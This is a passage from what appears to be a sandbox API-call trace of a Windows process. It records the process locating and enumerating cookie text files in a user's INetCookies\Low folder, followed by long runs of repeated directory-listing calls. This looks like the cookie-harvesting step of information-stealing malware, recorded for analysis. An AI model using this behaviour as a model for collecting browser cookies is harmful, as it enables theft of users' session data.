(lpStart="*.txt", lpEnd=0x0, wMatch=0xfffffffffff2005c) returned 0x0 [0251.442] PathCombineW (in: pszDest=0x79ce7d8, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low", pszFile="XUAUK5R0.txt" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\XUAUK5R0.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\XUAUK5R0.txt" [0251.442] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.442] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.442] lstrlenW (lpString="Y1I415YS.txt") returned 12 [0251.442] lstrlenW (lpString="*.txt") returned 5 [0251.442] wcscpy (in: _Dest=0x79ce9f8, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" [0251.442] StrRChrW (lpStart="*.txt", lpEnd=0x0, wMatch=0xfffffffffff2005c) returned 0x0 [0251.442] PathCombineW (in: pszDest=0x79ce9f8, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low", pszFile="Y1I415YS.txt" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\Y1I415YS.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\Y1I415YS.txt" [0251.442] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.442] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.442] lstrlenW (lpString="Y3XU5OKR.txt") returned 12 [0251.442] lstrlenW (lpString="*.txt") returned 5 [0251.442] wcscpy (in: _Dest=0x79ceb08, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" [0251.442] StrRChrW (lpStart="*.txt", lpEnd=0x0, wMatch=0xfffffffffff2005c) returned 0x0 [0251.442] PathCombineW (in: pszDest=0x79ceb08, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low", pszFile="Y3XU5OKR.txt" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\Y3XU5OKR.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\Y3XU5OKR.txt" [0251.442] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 0 [0251.442] FindClose (in: hFindFile=0x44067a0 | out: hFindFile=0x44067a0) returned 1 [0251.443] PathCombineW (in: pszDest=0x79c5810, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\*" [0251.443] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\*", lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 0x44064a0 [0251.444] FindNextFileW (in: hFindFile=0x44064a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.444] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.444] FindNextFileW (in: hFindFile=0x44064a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.444] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.444] FindNextFileW (in: hFindFile=0x44064a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.444] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.444] FindNextFileW (in: hFindFile=0x44064a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.444] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.444] FindNextFileW (in: hFindFile=0x44064a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.444] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.445] FindNextFileW (in: hFindFile=0x44064a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.445] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.445] FindNextFileW (in: hFindFile=0x44064a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.445] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.445] FindNextFileW (in: hFindFile=0x44064a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.445] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.445] FindNextFileW (in: hFindFile=0x44064a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.445] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.445] FindNextFileW (in: hFindFile=0x44064a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.445] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.445] FindNextFileW (in: hFindFile=0x44064a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.445] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.445] FindNextFileW (in: hFindFile=0x44064a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.445] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.445] FindNextFileW (in: hFindFile=0x44064a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.445] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.445] FindNextFileW (in: hFindFile=0x44064a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.445] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.445] FindNextFileW (in: hFindFile=0x44064a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.445] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.445] FindNextFileW (in: hFindFile=0x44064a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.445] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.445] FindNextFileW (in: hFindFile=0x44064a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.445] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.445] FindNextFileW (in: hFindFile=0x44064a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.445] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.445] FindNextFileW (in: hFindFile=0x44064a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.445] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.446] FindNextFileW (in: hFindFile=0x44064a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.446] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.446] FindNextFileW (in: hFindFile=0x44064a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.446] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.446] FindNextFileW (in: hFindFile=0x44064a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.446] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.446] FindNextFileW (in: hFindFile=0x44064a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.446] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.446] FindNextFileW (in: hFindFile=0x44064a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.446] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.446] FindNextFileW (in: hFindFile=0x44064a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.446] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.446] FindNextFileW (in: hFindFile=0x44064a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.446] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.446] FindNextFileW (in: hFindFile=0x44064a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.446] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.446] FindNextFileW (in: hFindFile=0x44064a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.446] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.446] FindNextFileW (in: hFindFile=0x44064a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.446] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.447] FindNextFileW (in: hFindFile=0x44064a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.447] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.447] FindNextFileW (in: hFindFile=0x44064a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.447] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.447] FindNextFileW (in: hFindFile=0x44064a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.447] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.447] FindNextFileW (in: hFindFile=0x44064a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.447] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.447] FindNextFileW (in: hFindFile=0x44064a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.447] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.447] FindNextFileW (in: hFindFile=0x44064a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.447] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.447] FindNextFileW (in: hFindFile=0x44064a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.447] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.447] FindNextFileW (in: hFindFile=0x44064a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.447] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.447] FindNextFileW (in: hFindFile=0x44064a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.447] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.447] FindNextFileW (in: hFindFile=0x44064a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.447] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.447] FindNextFileW (in: hFindFile=0x44064a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.447] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.447] FindNextFileW (in: hFindFile=0x44064a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.447] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.447] FindNextFileW (in: hFindFile=0x44064a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.447] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.447] FindNextFileW (in: hFindFile=0x44064a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.447] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.448] FindNextFileW (in: hFindFile=0x44064a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.448] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.448] FindNextFileW (in: hFindFile=0x44064a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.448] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.448] FindNextFileW (in: hFindFile=0x44064a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.448] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.448] FindNextFileW (in: hFindFile=0x44064a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.448] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.448] FindNextFileW (in: hFindFile=0x44064a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.448] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.448] FindNextFileW (in: hFindFile=0x44064a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.448] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.448] FindNextFileW (in: hFindFile=0x44064a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.448] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.448] FindNextFileW (in: hFindFile=0x44064a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.448] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.448] FindNextFileW (in: hFindFile=0x44064a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.448] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.448] FindNextFileW (in: hFindFile=0x44064a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.448] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.448] FindNextFileW (in: hFindFile=0x44064a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.448] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.448] FindNextFileW (in: hFindFile=0x44064a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.448] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.448] FindNextFileW (in: hFindFile=0x44064a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.448] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.448] FindNextFileW (in: hFindFile=0x44064a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.448] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.449] FindNextFileW (in: hFindFile=0x44064a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.449] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.449] FindNextFileW (in: hFindFile=0x44064a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.449] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.449] FindNextFileW (in: hFindFile=0x44064a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.449] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.449] FindNextFileW (in: hFindFile=0x44064a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.449] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.449] FindNextFileW (in: hFindFile=0x44064a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.449] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.449] FindNextFileW (in: hFindFile=0x44064a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.449] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.449] FindNextFileW (in: hFindFile=0x44064a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.449] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.449] FindNextFileW (in: hFindFile=0x44064a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.449] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.449] FindNextFileW (in: hFindFile=0x44064a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.449] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.449] FindNextFileW (in: hFindFile=0x44064a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.449] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.449] FindNextFileW (in: hFindFile=0x44064a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.449] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.449] FindNextFileW (in: hFindFile=0x44064a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.449] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.449] FindNextFileW (in: hFindFile=0x44064a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.449] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.449] FindNextFileW (in: hFindFile=0x44064a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.449] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.450] FindNextFileW (in: hFindFile=0x44064a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.450] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.450] FindNextFileW (in: hFindFile=0x44064a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.450] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.450] FindNextFileW (in: hFindFile=0x44064a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.450] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.450] FindNextFileW (in: hFindFile=0x44064a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.450] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.450] FindNextFileW (in: hFindFile=0x44064a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.450] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.450] FindNextFileW (in: hFindFile=0x44064a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.450] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.450] FindNextFileW (in: hFindFile=0x44064a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.450] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.450] FindNextFileW (in: hFindFile=0x44064a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.450] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.450] FindNextFileW (in: hFindFile=0x44064a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.450] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.450] FindNextFileW (in: hFindFile=0x44064a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.450] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.450] FindNextFileW (in: hFindFile=0x44064a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.450] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.450] FindNextFileW (in: hFindFile=0x44064a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.450] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.450] FindNextFileW (in: hFindFile=0x44064a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.450] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.450] FindNextFileW (in: hFindFile=0x44064a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.450] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.450] FindNextFileW (in: hFindFile=0x44064a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.451] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.451] FindNextFileW (in: hFindFile=0x44064a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.451] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.451] FindNextFileW (in: hFindFile=0x44064a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.451] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.451] FindNextFileW (in: hFindFile=0x44064a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.451] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.451] FindNextFileW (in: hFindFile=0x44064a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.451] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.451] FindNextFileW (in: hFindFile=0x44064a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.451] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.451] FindNextFileW (in: hFindFile=0x44064a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.451] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.451] FindNextFileW (in: hFindFile=0x44064a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.451] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.451] FindNextFileW (in: hFindFile=0x44064a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.451] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.451] FindNextFileW (in: hFindFile=0x44064a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.451] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.451] FindNextFileW (in: hFindFile=0x44064a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.451] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.451] FindNextFileW (in: hFindFile=0x44064a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.451] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.451] FindNextFileW (in: hFindFile=0x44064a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.451] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.451] FindNextFileW (in: hFindFile=0x44064a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.451] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.451] FindNextFileW (in: hFindFile=0x44064a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.451] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.452] FindNextFileW (in: hFindFile=0x44064a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.452] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.452] FindNextFileW (in: hFindFile=0x44064a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.452] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.452] FindNextFileW (in: hFindFile=0x44064a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.452] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.452] FindNextFileW (in: hFindFile=0x44064a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.452] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.452] FindNextFileW (in: hFindFile=0x44064a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.452] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.452] FindNextFileW (in: hFindFile=0x44064a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.452] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.452] FindNextFileW (in: hFindFile=0x44064a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.452] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.452] FindNextFileW (in: hFindFile=0x44064a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.452] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.452] FindNextFileW (in: hFindFile=0x44064a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.452] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.452] FindNextFileW (in: hFindFile=0x44064a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.452] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.452] FindNextFileW (in: hFindFile=0x44064a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.452] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.452] FindNextFileW (in: hFindFile=0x44064a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.452] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.452] FindNextFileW (in: hFindFile=0x44064a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.452] WaitForSingleObject (hHandle=0x458, 